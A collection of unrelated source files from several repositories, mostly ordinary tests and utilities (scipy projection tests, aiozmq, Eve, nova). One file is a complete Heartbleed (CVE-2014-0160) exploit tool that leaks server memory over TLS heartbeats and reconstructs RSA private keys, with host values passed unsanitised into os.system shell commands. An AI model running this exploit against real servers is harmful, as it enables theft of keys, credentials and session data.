self.assert_equal(1, test())
self.assert_equal(total_iterations[0], 2-1)
def test_future_exception_ignore(self):
@runloop_coroutine()
def test():
exc, _, _ = yield future(raise_value_error()), future(block_loop(1)), future(block_loop(1))
try:
yield exc
except ValueError:
raise
self.assert_raises(ValueError, test)
def test_ready_wait(self):
@runloop_coroutine()
def test():
d1, d2, d3 = yield deferred(), deferred(), deferred()
d1.set_value(1)
d2.set_exception(ValueError())
ready = yield wait([d1, d2, d3], count=2)
self.assert_in(d1, ready)
self.assert_in(d2, ready)
test()
def test_wait_until_blocked(self):
deferreds = []
def set_value(_):
deferreds[0].set_value(1)
@runloop_coroutine()
def test():
with current_run_loop().on_queue_exhausted.connected_to(set_value):
d = yield deferred()
deferreds.append(d)
yield wait([d])
test() # shouldn't block
def test_wait_doesnt_change_list(self):
deferreds = []
def set_value(_):
deferreds[0].set_value(1)
@runloop_coroutine()
def test():
with current_run_loop().on_queue_exhausted.connected_to(set_value):
d = yield deferred()
deferreds.append(d)
d2 = yield deferred()
d2.set_value(2)
ready = yield wait([d, d2], count=1)
self.assert_equals(1, len(ready))
ready2 = yield wait([d], count=1)
self.assert_equals(1, len(ready))
self.assert_equals(1, len(ready2))
test()
| mikekap/batchy | tests/runloop_tests.py | Python | apache-2.0 | 9,494 |
import numpy as np
import scipy.linalg
from scipy.sparse import csc_matrix
from scipy.optimize._trustregion_constr.projections \
import projections, orthogonality
from numpy.testing import (TestCase, assert_array_almost_equal,
assert_equal, assert_allclose)
try:
from sksparse.cholmod import cholesky_AAt
sksparse_available = True
available_sparse_methods = ("NormalEquation", "AugmentedSystem")
except ImportError:
sksparse_available = False
available_sparse_methods = ("AugmentedSystem",)
available_dense_methods = ('QRFactorization', 'SVDFactorization')
class TestProjections(TestCase):
def test_nullspace_and_least_squares_sparse(self):
A_dense = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
At_dense = A_dense.T
A = csc_matrix(A_dense)
test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
[1, 10, 3, 0, 1, 6, 7, 8],
[1.12, 10, 0, 0, 100000, 6, 0.7, 8])
for method in available_sparse_methods:
Z, LS, _ = projections(A, method)
for z in test_points:
# Test if x is in the null_space
x = Z.matvec(z)
assert_array_almost_equal(A.dot(x), 0)
# Test orthogonality
assert_array_almost_equal(orthogonality(A, x), 0)
# Test if x is the least square solution
x = LS.matvec(z)
x2 = scipy.linalg.lstsq(At_dense, z)[0]
assert_array_almost_equal(x, x2)
def test_iterative_refinements_sparse(self):
A_dense = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
A = csc_matrix(A_dense)
test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
[1, 10, 3, 0, 1, 6, 7, 8],
[1.12, 10, 0, 0, 100000, 6, 0.7, 8],
[1, 0, 0, 0, 0, 1, 2, 3+1e-10])
for method in available_sparse_methods:
Z, LS, _ = projections(A, method, orth_tol=1e-18, max_refin=100)
for z in test_points:
# Test if x is in the null_space
x = Z.matvec(z)
atol = 1e-13 * abs(x).max()
assert_allclose(A.dot(x), 0, atol=atol)
# Test orthogonality
assert_allclose(orthogonality(A, x), 0, atol=1e-13)
def test_rowspace_sparse(self):
A_dense = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
A = csc_matrix(A_dense)
test_points = ([1, 2, 3],
[1, 10, 3],
[1.12, 10, 0])
for method in available_sparse_methods:
_, _, Y = projections(A, method)
for z in test_points:
# Test if x is solution of A x = z
x = Y.matvec(z)
assert_array_almost_equal(A.dot(x), z)
# Test if x is in the return row space of A
A_ext = np.vstack((A_dense, x))
assert_equal(np.linalg.matrix_rank(A_dense),
np.linalg.matrix_rank(A_ext))
def test_nullspace_and_least_squares_dense(self):
A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
At = A.T
test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
[1, 10, 3, 0, 1, 6, 7, 8],
[1.12, 10, 0, 0, 100000, 6, 0.7, 8])
for method in available_dense_methods:
Z, LS, _ = projections(A, method)
for z in test_points:
# Test if x is in the null_space
x = Z.matvec(z)
assert_array_almost_equal(A.dot(x), 0)
# Test orthogonality
assert_array_almost_equal(orthogonality(A, x), 0)
# Test if x is the least square solution
x = LS.matvec(z)
x2 = scipy.linalg.lstsq(At, z)[0]
assert_array_almost_equal(x, x2)
def test_compare_dense_and_sparse(self):
D = np.diag(range(1, 101))
A = np.hstack([D, D, D, D])
A_sparse = csc_matrix(A)
np.random.seed(0)
Z, LS, Y = projections(A)
Z_sparse, LS_sparse, Y_sparse = projections(A_sparse)
for k in range(20):
z = np.random.normal(size=(400,))
assert_array_almost_equal(Z.dot(z), Z_sparse.dot(z))
assert_array_almost_equal(LS.dot(z), LS_sparse.dot(z))
x = np.random.normal(size=(100,))
assert_array_almost_equal(Y.dot(x), Y_sparse.dot(x))
def test_compare_dense_and_sparse2(self):
D1 = np.diag([-1.7, 1, 0.5])
D2 = np.diag([1, -0.6, -0.3])
D3 = np.diag([-0.3, -1.5, 2])
A = np.hstack([D1, D2, D3])
A_sparse = csc_matrix(A)
np.random.seed(0)
Z, LS, Y = projections(A)
Z_sparse, LS_sparse, Y_sparse = projections(A_sparse)
for k in range(1):
z = np.random.normal(size=(9,))
assert_array_almost_equal(Z.dot(z), Z_sparse.dot(z))
assert_array_almost_equal(LS.dot(z), LS_sparse.dot(z))
x = np.random.normal(size=(3,))
assert_array_almost_equal(Y.dot(x), Y_sparse.dot(x))
def test_iterative_refinements_dense(self):
A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
test_points = ([1, 2, 3, 4, 5, 6, 7, 8],
[1, 10, 3, 0, 1, 6, 7, 8],
[1, 0, 0, 0, 0, 1, 2, 3+1e-10])
for method in available_dense_methods:
Z, LS, _ = projections(A, method, orth_tol=1e-18, max_refin=10)
for z in test_points:
# Test if x is in the null_space
x = Z.matvec(z)
assert_allclose(A.dot(x), 0, rtol=0, atol=2.5e-14)
# Test orthogonality
assert_allclose(orthogonality(A, x), 0, rtol=0, atol=5e-16)
def test_rowspace_dense(self):
A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
test_points = ([1, 2, 3],
[1, 10, 3],
[1.12, 10, 0])
for method in available_dense_methods:
_, _, Y = projections(A, method)
for z in test_points:
# Test if x is solution of A x = z
x = Y.matvec(z)
assert_array_almost_equal(A.dot(x), z)
# Test if x is in the return row space of A
A_ext = np.vstack((A, x))
assert_equal(np.linalg.matrix_rank(A),
np.linalg.matrix_rank(A_ext))
class TestOrthogonality(TestCase):
def test_dense_matrix(self):
A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
test_vectors = ([-1.98931144, -1.56363389,
-0.84115584, 2.2864762,
5.599141, 0.09286976,
1.37040802, -0.28145812],
[697.92794044, -4091.65114008,
-3327.42316335, 836.86906951,
99434.98929065, -1285.37653682,
-4109.21503806, 2935.29289083])
test_expected_orth = (0, 0)
for i in range(len(test_vectors)):
x = test_vectors[i]
orth = test_expected_orth[i]
assert_array_almost_equal(orthogonality(A, x), orth)
def test_sparse_matrix(self):
A = np.array([[1, 2, 3, 4, 0, 5, 0, 7],
[0, 8, 7, 0, 1, 5, 9, 0],
[1, 0, 0, 0, 0, 1, 2, 3]])
A = csc_matrix(A)
test_vectors = ([-1.98931144, -1.56363389,
-0.84115584, 2.2864762,
5.599141, 0.09286976,
1.37040802, -0.28145812],
[697.92794044, -4091.65114008,
-3327.42316335, 836.86906951,
99434.98929065, -1285.37653682,
-4109.21503806, 2935.29289083])
test_expected_orth = (0, 0)
for i in range(len(test_vectors)):
x = test_vectors[i]
orth = test_expected_orth[i]
assert_array_almost_equal(orthogonality(A, x), orth)
| WarrenWeckesser/scipy | scipy/optimize/_trustregion_constr/tests/test_projections.py | Python | bsd-3-clause | 8,820 |
#!/usr/bin/env python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
# -added option to have verbose output
# -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command
# -added option for hex output
# -added option to output raw data to a file
# -added option to output ascii data to a file
# -added option to not display returned data on screen (good if doing many iterations and outputting to a file)
# -added tls version auto-detection
# -added an extract rsa private key mode (orig code from epixoip. will exit script when found and enables -d (do not display returned data on screen)
# -requires following modules: gmpy, pyasn1
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
import time
import os
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')
options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')
options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port')
options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output')
options.add_option('-x', '--hexdump', action="store_true", dest="hexdump", help='Enable hex output')
options.add_option('-r', '--rawoutfile', type='str', help='Dump the raw memory contents to a file')
options.add_option('-a', '--asciioutfile', type='str', help='Dump the ascii contents to a file')
options.add_option('-d', '--donotdisplay', action="store_true", dest="donotdisplay", help='Do not display returned data on screen')
options.add_option('-e', '--extractkey', action="store_true", dest="extractkey", help='Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.')
opts, args = options.parse_args()
if opts.extractkey:
import base64, gmpy
from pyasn1.codec.der import encoder
from pyasn1.type.univ import *
def hex2bin(arr):
return ''.join('{:02x}'.format(x) for x in arr).decode('hex')
tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}
def build_client_hello(tls_ver):
client_hello = [
# TLS header ( 5 bytes)
0x16, # Content type (0x16 for handshake)
0x03, tls_ver, # TLS Version
0x00, 0xdc, # Length
# Handshake header
0x01, # Type (0x01 for ClientHello)
0x00, 0x00, 0xd8, # Length
0x03, tls_ver, # TLS Version
# Random (32 byte)
0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,
0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,
0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,
0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,
0x00, # Session ID length
0x00, 0x66, # Cipher suites length
# Cipher suites (51 suites)
0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,
0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,
0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,
0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,
0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,
0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,
0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,
0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,
0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,
0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,
0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,
0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,
0x00, 0x06, 0x00, 0x03, 0x00, 0xff,
0x01, # Compression methods length
0x00, # Compression method (0x00 for NULL)
0x00, 0x49, # Extensions length
# Extension: ec_point_formats
0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,
# Extension: elliptic_curves
0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,
0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,
0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,
0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,
0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,
0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,
0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,
# Extension: SessionTicket TLS
0x00, 0x23, 0x00, 0x00,
# Extension: Heartbeat
0x00, 0x0f, 0x00, 0x01, 0x01
]
return client_hello
def build_heartbeat(tls_ver):
heartbeat = [
0x18, # Content Type (Heartbeat)
0x03, tls_ver, # TLS version
0x00, 0x03, # Length
# Payload
0x01, # Type (Request)
0x40, 0x00 # Payload length
]
return heartbeat
if opts.rawoutfile:
rawfileOUT = open(opts.rawoutfile, "a")
if opts.asciioutfile:
asciifileOUT = open(opts.asciioutfile, "a")
if opts.extractkey:
opts.donotdisplay = True
def hexdump(s):
pdat = ''
hexd = ''
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
if opts.hexdump:
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
hexd += ' %04x: %-48s %s\n' % (b, hxdat, pdat)
else:
pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin)
if opts.hexdump:
return hexd
else:
pdat = re.sub(r'([.]{50,})', '', pdat)
if opts.asciioutfile:
asciifileOUT.write(pdat)
return pdat
def rcv_tls_record(s):
try:
tls_header = s.recv(5)
if not tls_header:
print 'Unexpected EOF (header)'
return None,None,None
typ,ver,length = struct.unpack('>BHH',tls_header)
message = ''
while len(message) != length:
message += s.recv(length-len(message))
if not message:
print 'Unexpected EOF (message)'
return None,None,None
if opts.verbose:
print 'Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,)
return typ,ver,message
except Exception as e:
print "\nError Receiving Record! " + str(e)
return None,None,None
def hit_hb(s, targ, firstrun, supported):
s.send(hex2bin(build_heartbeat(supported)))
while True:
typ, ver, pay = rcv_tls_record(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return ''
if typ == 24:
if opts.verbose:
print 'Received heartbeat response...'
if len(pay) > 3:
if firstrun or opts.verbose:
print '\nWARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'
if opts.rawoutfile:
rawfileOUT.write(pay)
if opts.extractkey:
return pay
else:
return hexdump(pay)
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
if typ == 21:
print 'Received alert:'
return hexdump(pay)
print 'Server returned error, likely not vulnerable'
return ''
def conn(targ, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.settimeout(10)
#time.sleep(0.2)
s.connect((targ, port))
return s
except Exception as e:
print "Connection Error! " + str(e)
return None
def bleed(targ, port):
try:
res = ''
firstrun = True
print '\n##################################################################'
print 'Connecting to: ' + targ + ':' + str(port) + ', ' + str(opts.num) + ' times'
for x in range(0, opts.num):
if x > 0:
firstrun = False
if x == 0 and opts.extractkey:
print "Attempting to extract private key from returned data..."
if not os.path.exists('./hb-certs'):
os.makedirs('./hb-certs')
print '\nGrabbing public cert from: ' + targ + ':' + str(port) + '\n'
os.system('echo | openssl s_client -connect ' + targ + ':' + str(port) + ' -showcerts | openssl x509 > hb-certs/sslcert_' + targ + '.pem')
print '\nExtracting modulus from cert...\n'
os.system('openssl x509 -pubkey -noout -in hb-certs/sslcert_' + targ + '.pem > hb-certs/sslcert_' + targ + '_pubkey.pem')
output = os.popen('openssl x509 -in hb-certs/sslcert_' + targ + '.pem -modulus -noout | cut -d= -f2')
modulus = output.read()
s = conn(targ, port)
if not s:
continue
# send starttls command if specified as an option or if common smtp/pop3/imap ports are used
if (opts.starttls) or (port in {25, 587, 110, 143, 21}):
stls = False
atls = False
# check if smtp supports starttls/stls
if port in {25, 587}:
print 'SMTP Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
s.send("EHLO someone.org\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if pop3/imap supports starttls/stls
elif port in {110, 143}:
print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
if port == 110:
s.send("CAPA\n")
if port == 143:
s.send("CAPABILITY\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if ftp supports auth tls/starttls
elif port in {21}:
print 'FTP Port... Checking for AUTH TLS Capability...'
check = s.recv(1024)
s.send("FEAT\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "AUTH TLS" in check:
opts.starttls = True
atls = True
print "AUTH TLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# send appropriate tls command if supported
if opts.starttls:
sys.stdout.flush()
if stls:
print 'Sending STLS Command...'
s.send("STLS\n")
elif atls:
print 'Sending AUTH TLS Command...'
s.send("AUTH TLS\n")
else:
print 'Sending STARTTLS Command...'
s.send("STARTTLS\n")
if opts.verbose:
print 'Waiting for reply...'
sys.stdout.flush()
rcv_tls_record(s)
supported = False
for num,tlsver in tls_versions.items():
if firstrun:
print 'Sending Client Hello for {}'.format(tlsver)
s.send(hex2bin(build_client_hello(num)))
if opts.verbose:
print 'Waiting for Server Hello...'
while True:
typ,ver,message = rcv_tls_record(s)
if not typ:
if opts.verbose:
print 'Server closed connection without sending ServerHello for {}'.format(tlsver)
s.close()
s = conn(targ, port)
break
if typ == 22 and ord(message[0]) == 0x0E:
if firstrun:
print 'Received Server Hello for {}'.format(tlsver)
supported = True
break
if supported: break
if not supported:
print '\nError! No TLS versions supported!'
print '##################################################################'
return
if opts.verbose:
print '\nSending heartbeat request...'
sys.stdout.flush()
keyfound = False
if opts.extractkey:
res = hit_hb(s, targ, firstrun, supported)
if res == '':
continue
keyfound = extractkey(targ, res, modulus)
else:
res += hit_hb(s, targ, firstrun, supported)
s.close()
if keyfound:
sys.exit(0)
else:
sys.stdout.write('\rPlease wait... connection attempt ' + str(x+1) + ' of ' + str(opts.num))
sys.stdout.flush()
print '\n##################################################################'
print
return res
except Exception as e:
print "Error! " + str(e)
print '##################################################################'
print
def extractkey(host, chunk, modulus):
#print "\nChecking for private key...\n"
n = int (modulus, 16)
keysize = n.bit_length() / 16
for offset in xrange (0, len (chunk) - keysize):
p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16)
if gmpy.is_prime (p) and p != n and n % p == 0:
if opts.verbose:
print '\n\nFound prime: ' + str(p)
e = 65537
q = n / p
phi = (p - 1) * (q - 1)
d = gmpy.invert (e, phi)
dp = d % (p - 1)
dq = d % (q - 1)
qinv = gmpy.invert (q, p)
seq = Sequence()
for x in [0, n, e, d, p, q, dp, dq, qinv]:
seq.setComponentByPosition (len (seq), Integer (x))
print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq))
privkeydump = open("hb-certs/privkey_" + host + ".dmp", "a")
privkeydump.write(chunk)
return True
else:
return False
def main():
print "\ndefribulator v1.16"
print "A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)"
allresults = ''
# if a file is specified, loop through file
if opts.filein:
fileIN = open(opts.filein, "r")
for line in fileIN:
targetinfo = line.strip().split(":")
if len(targetinfo) > 1:
allresults = bleed(targetinfo[0], int(targetinfo[1]))
else:
allresults = bleed(targetinfo[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
fileIN.close()
else:
if len(args) < 1:
options.print_help()
return
allresults = bleed(args[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
print
if opts.rawoutfile:
rawfileOUT.close()
if opts.asciioutfile:
asciifileOUT.close()
if __name__ == '__main__':
main()
| injcristianrojas/heartbleed-example | heartbleed.py | Python | mit | 17,715 |
# -*- coding: utf-8 -*-
"""
eve.methods
~~~~~~~~~~~
This package implements the HTTP methods supported by Eve.
:copyright: (c) 2015 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
# flake8: noqa
from eve.methods.get import get, getitem
from eve.methods.post import post
from eve.methods.patch import patch
from eve.methods.put import put
from eve.methods.delete import delete, deleteitem
| eduardomb/eve | eve/methods/__init__.py | Python | bsd-3-clause | 432 |
"""
The main script
"""
import argparse
import summaryrank.features
import summaryrank.importers
import summaryrank.tools
DESCRIPTION = '''
SummaryRank is a set of tools that help producing machine-learned
summary/sentence rankers. It supports a wide range of functions such
as generating judgments in trec_eval format or creating feature
vectors in the SVMLight format.
corpora tools:
{}
representations and features:
{}
commands:
{}
'''
IMPORTER_FUNCTIONS = [
("import_webap", summaryrank.importers.import_webap),
("import_trec_novelty", summaryrank.importers.import_trec_novelty),
("import_mobileclick", summaryrank.importers.import_mobileclick),
]
FEATURE_FUNCTIONS = [
("gen_term", summaryrank.features.gen_term),
("gen_freqstats", summaryrank.features.gen_freqstats),
("gen_esa", summaryrank.features.gen_esa),
("gen_tagme", summaryrank.features.gen_tagme),
("extract", summaryrank.features.extract),
("contextualize", summaryrank.features.contextualize),
]
GENERAL_FUNCTIONS = [
("describe", summaryrank.tools.describe),
("cut", summaryrank.tools.cut),
("join", summaryrank.tools.join),
("shuffle", summaryrank.tools.shuffle),
("split", summaryrank.tools.split),
("normalize", summaryrank.tools.normalize),
]
def _make_command_list(functions):
""" Prepare a formatted list of commands. """
return [' {:24}{}\n'.format(name, func.__doc__.strip().splitlines()[0])
for name, func in functions]
if __name__.endswith('__main__'):
importer_commands = ''.join(_make_command_list(IMPORTER_FUNCTIONS))
feature_commands = ''.join(_make_command_list(FEATURE_FUNCTIONS))
general_commands = ''.join(_make_command_list(GENERAL_FUNCTIONS))
parser = argparse.ArgumentParser(
prog='summaryrank',
formatter_class=argparse.RawDescriptionHelpFormatter,
usage='%(prog)s [options..] command [args..]',
add_help=False,
description=DESCRIPTION.format(
importer_commands, feature_commands, general_commands)
)
parser.add_argument('command', nargs='?', help=argparse.SUPPRESS)
parser.add_argument('argv', nargs=argparse.REMAINDER, help=argparse.SUPPRESS)
args = parser.parse_args()
commands = dict()
commands.update(IMPORTER_FUNCTIONS)
commands.update(FEATURE_FUNCTIONS)
commands.update(GENERAL_FUNCTIONS)
if args.command in commands:
commands[args.command](args.argv)
else:
if args.command is not None:
parser.error("invalid command '{}'".format(args.command))
else:
parser.print_help()
| rmit-ir/SummaryRank | summaryrank/__main__.py | Python | mit | 2,623 |
import os
import sys
import shutil
import tools
import subprocess
import helpers
sys.path.insert(0,"../..")
def list_to_str(l):
ans=""
if len(l)==0:
return ans
for i in range(0,len(l)-1):
ans+=l[i]+"\n"
ans+=l[len(l)-1]
return ans
def test():
print "test"
def pwd():
return os.getcwd()
def cd(param):
#print "arg:"+arg
#print "param:"+param
#print(d[0])
#print len(d)
print "change current directory to "+param
os.chdir(param)
def ls(*d):
if(len(d)==0):
cur=os.getcwd()
ret=os.listdir(cur)
else:
ret=os.listdir(d[0])
return list_to_str(ret)
def cat(param):
if not os.path.exists(param):
raise Exception("No such file exists!")
f=open(param)
lines=f.readlines()
ans=""
if len(lines)==0:
return ans
for i in range(0,len(lines)-1):
ans+=lines[i]
ans+=lines[len(lines)-1]
return ans
def rm(path):
if '*' in path:
import re
path_dir=os.path.dirname(path) or '.'
file_name=os.path.basename(path)
p=re.compile(file_name,re.IGNORECASE)
fns=os.listdir(path_dir)
for fn in fns:
if p.match(fn):
os.remove(fn)
return
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def grep(match,source):
ans=[]
for s in source.split('\n'):
if match in s:
ans.append(s)
return list_to_str(ans)
def redirect(source,destination):
#if os.path.isfile(destination):
f=open(destination,"w")
f.write(source)
#else:
# f=open(destination,'w')
# raise Exception("No such file "+destination)
def wc(s):
return len(s.split('\n'))
def mkdir(path):
if os.path.exists(path):
raise Exception("Directory already existed!")
else:
os.mkdir(path)
return "Directory "+path+" created!"
def touch(fn):
if os.path.exists(fn):
raise Exception("file "+fn+" already exist!")
else:
f=open(fn,"w")
f.close
return "File created: "+fn
def cp(source,destination):
if not os.path.exists(source):
raise Exception("No such file exists!")
if os.path.isfile(source):
shutil.copy(source,destination)
else:
if(os.path.exists(destination) and os.path.isfile(destination)):
raise Exception("File "+destination+" exists, please specify another directory name for dir copy!")
if(not os.path.exists(destination)):
mkdir(destination)
for f in os.listdir(source):
abf=source+'\\'+f
if os.path.isdir(abf):
cp(abf,destination+'\\'+f)
else:
shutil.copy(abf,destination)
def mv(source,destination):
shutil.move(source,destination)
def sh(fn):
f=open(fn,"r")
for l in f:
tools.parse(l.strip())
def echo(*ss):
ans=""
for s in ss:
ans+=s.replace('"','')+" "
return ans
def diff(fn1,fn2):
ans=[]
f1=open(fn1,"r")
f2=open(fn2,"r")
list1=f1.readlines()
list2=f2.readlines()
max_len=max([len(list1),len(list2)])
min_len=min([len(list1),len(list2)])
for i in range(0,min_len):
s1=list1[i]
s2=list2[i]
if s1!=s2:
ans.append("line "+str(i+1)+": "+s1 +"\t"+s2)
for i in range(min_len,max_len):
s=list1[i]
if s:
ans.append("line "+str(i+1)+": "+s+"\t")
else:
ans.append("line "+str(i+1)+": "+"\t"+s)
return list_to_str(ans)
def read(*ss):
ans=""
for s in ss:
ans+=s.replace('"','')+" "
raw_input(ans)
def call(*p):
ans=""
for cmd in p:
ans+=cmd+" "
os.system(ans)
def findinfile(p,d=os.getcwd()):
ans=""
for f in os.listdir(d):
absf=d+"\\"+f
if os.path.isdir(absf):
ans=ans+findinfile(p,absf)
else:
if helpers.istext(absf):
content=open(absf,'r').readlines()
#print "search in file "+(d+f)
#contains=False
for s in content:
if p in s:
ans+=absf+"\n"
break
return ans
| log4leo/Shell4Win | src/utilities.py | Python | mit | 4,412 |
import asyncio
import aiozmq
import zmq
async def monitor_stream(stream):
try:
while True:
event = await stream.read_event()
print(event)
except aiozmq.ZmqStreamClosed:
pass
async def go():
router = await aiozmq.create_zmq_stream(zmq.ROUTER, bind="tcp://127.0.0.1:*")
addr = list(router.transport.bindings())[0]
dealer = await aiozmq.create_zmq_stream(zmq.DEALER)
await dealer.transport.enable_monitor()
asyncio.Task(monitor_stream(dealer))
await dealer.transport.connect(addr)
for i in range(10):
msg = (b"data", b"ask", str(i).encode("utf-8"))
dealer.write(msg)
data = await router.read()
router.write(data)
answer = await dealer.read()
print(answer)
router.close()
dealer.close()
def main():
asyncio.run(go())
print("DONE")
if __name__ == "__main__":
main()
| aio-libs/aiozmq | examples/stream_monitor.py | Python | bsd-2-clause | 919 |
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.integrated.v3 import test_servers
class AdminPasswordJsonTest(test_servers.ServersSampleBase):
extension_name = 'os-admin-password'
def test_server_password(self):
uuid = self._post_server()
subs = {"password": "foo"}
response = self._do_post('servers/%s/action' % uuid,
'admin-password-change-password',
subs)
self.assertEqual(response.status, 204)
self.assertEqual(response.read(), "")
| afrolov1/nova | nova/tests/integrated/v3/test_admin_password.py | Python | apache-2.0 | 1,153 |
#!/usr/bin/env python
# Output formatters (for printing info and data files)
#
# Copyright (C) 2014 Peter Wu <peter@lekensteyn.nl>
import math
from defs import info, data
# Python 2.7 compatibility
if b'' == '':
import functools, itertools
iterbytes = functools.partial(itertools.imap, ord)
else:
iterbytes = iter
class BasePrinter(object):
"""Prints the info, data header or data in verbose form."""
def __init__(self, filename):
pass
def print_info(self, t):
print_namedtuple(t, info)
def print_data_header(self, t):
print_namedtuple(t, data)
def print_data(self, t, date):
print_namedtuple(t, data)
class RawPrinter(BasePrinter):
"""Prints raw bytes in hex form, possibly with headers."""
def print_data(self, t, date):
# Convert interpreted numbers back to bytes...
